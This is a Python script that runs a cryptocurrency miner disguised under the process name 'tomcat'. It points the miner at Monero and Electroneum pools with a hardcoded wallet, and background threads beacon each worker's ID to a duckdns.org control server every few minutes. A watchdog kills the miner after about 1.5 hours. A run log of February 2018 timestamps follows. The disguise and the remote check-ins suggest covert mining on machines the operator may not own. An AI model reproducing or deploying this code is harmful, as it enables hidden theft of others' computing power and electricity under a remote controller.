import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:07.354473
#2018-02-17 16:52:06.828688
#2018-02-17 18:40:06.711743
#2018-02-17 20:28:01.759394
#2018-02-17 22:14:01.392232
#2018-02-17 23:58:04.648064
#2018-02-18 01:49:01.872147
#2018-02-18 03:36:05.669431
#2018-02-18 05:23:02.014070
#2018-02-18 07:14:07.156957
#2018-02-18 09:02:01.326924
#2018-02-18 10:49:05.470656
#2018-02-18 12:34:02.605621
#2018-02-18 14:21:02.103075
#2018-02-18 16:11:06.040576
#2018-02-18 18:01:03.827940
#2018-02-18 19:48:07.244034
#2018-02-18 21:34:02.981676
#2018-02-18 23:23:05.853747
#2018-02-19 01:09:07.121487
#2018-02-19 02:54:07.564200
#2018-02-19 04:40:07.808383
#2018-02-19 06:24:07.252120
#2018-02-19 08:13:05.723702
#2018-02-19 10:03:05.155067
#2018-02-19 11:52:08.871904
#2018-02-19 13:39:06.190284
#2018-02-19 15:26:04.366942
#2018-02-19 17:14:01.535326
#2018-02-19 19:02:08.547896
#2018-02-19 20:47:06.975591
#2018-02-19 22:35:04.565113
#2018-02-20 00:20:06.790923
#2018-02-20 02:08:05.145914
#2018-02-20 03:57:04.233061
#2018-02-20 05:42:01.421246
#2018-02-20 07:28:05.595714
#2018-02-20 09:13:05.603975
#2018-02-20 10:56:06.831908
#2018-02-20 12:45:07.427079
#2018-02-20 14:30:11.971276
#2018-02-20 16:16:03.184057
#2018-02-20 18:04:05.760679
#2018-02-20 19:54:06.190735
#2018-02-20 21:41:06.619809
#2018-02-20 23:23:06.701530
#2018-02-21 01:07:07.227286
#2018-02-21 02:54:06.114796
#2018-02-21 04:42:05.719539
#2018-02-21 06:29:06.411504
#2018-02-21 08:13:06.265106
#2018-02-21 10:00:02.530474
#2018-02-21 11:47:06.809155
#2018-02-21 13:39:01.378802
#2018-02-21 15:22:06.762466
#2018-02-21 17:12:04.667397
#2018-02-21 19:03:05.148598
#2018-02-21 20:51:01.523407
#2018-02-21 22:36:07.406034
#2018-02-22 00:25:08.823821
#2018-02-22 02:12:05.251793
#2018-02-22 03:59:01.968808
#2018-02-22 05:46:02.079648
#2018-02-22 07:31:04.896022
#2018-02-22 09:18:02.050873
#2018-02-22 11:05:10.236200
#2018-02-22 12:50:04.249931
#2018-02-22 14:36:04.087698
#2018-02-22 16:22:06.256339
#2018-02-22 18:08:08.628157
#2018-02-22 19:57:08.160763
#2018-02-22 21:46:06.541581
#2018-02-22 23:34:04.201520
#2018-02-23 01:22:04.313758
#2018-02-23 03:08:03.697842
#2018-02-23 04:56:06.578833
#2018-02-23 06:42:07.851682
#2018-02-23 08:32:07.245391
#2018-02-23 10:46:01.587188
#2018-02-23 12:41:05.008069
#2018-02-23 14:26:02.168585
#2018-02-23 16:17:04.410919
#2018-02-23 18:04:06.125399
#2018-02-23 19:49:01.707535
#2018-02-23 21:32:04.591726
#2018-02-23 23:20:06.403468
#2018-02-24 01:12:06.436759
#2018-02-24 03:04:06.665931
#2018-02-24 04:50:01.274512
#2018-02-24 06:28:01.979061
#2018-02-24 08:17:05.934565
#2018-02-24 10:02:06.013561
#2018-02-24 12:00:02.052619
#2018-02-24 13:47:05.781336
#2018-02-24 15:45:03.852296
#2018-02-24 17:51:03.868680
#2018-02-24 19:38:04.575242
#2018-02-24 21:25:07.970528
#2018-02-25 00:06:04.005237
#2018-02-25 04:06:01.412151
#2018-02-25 07:37:03.711571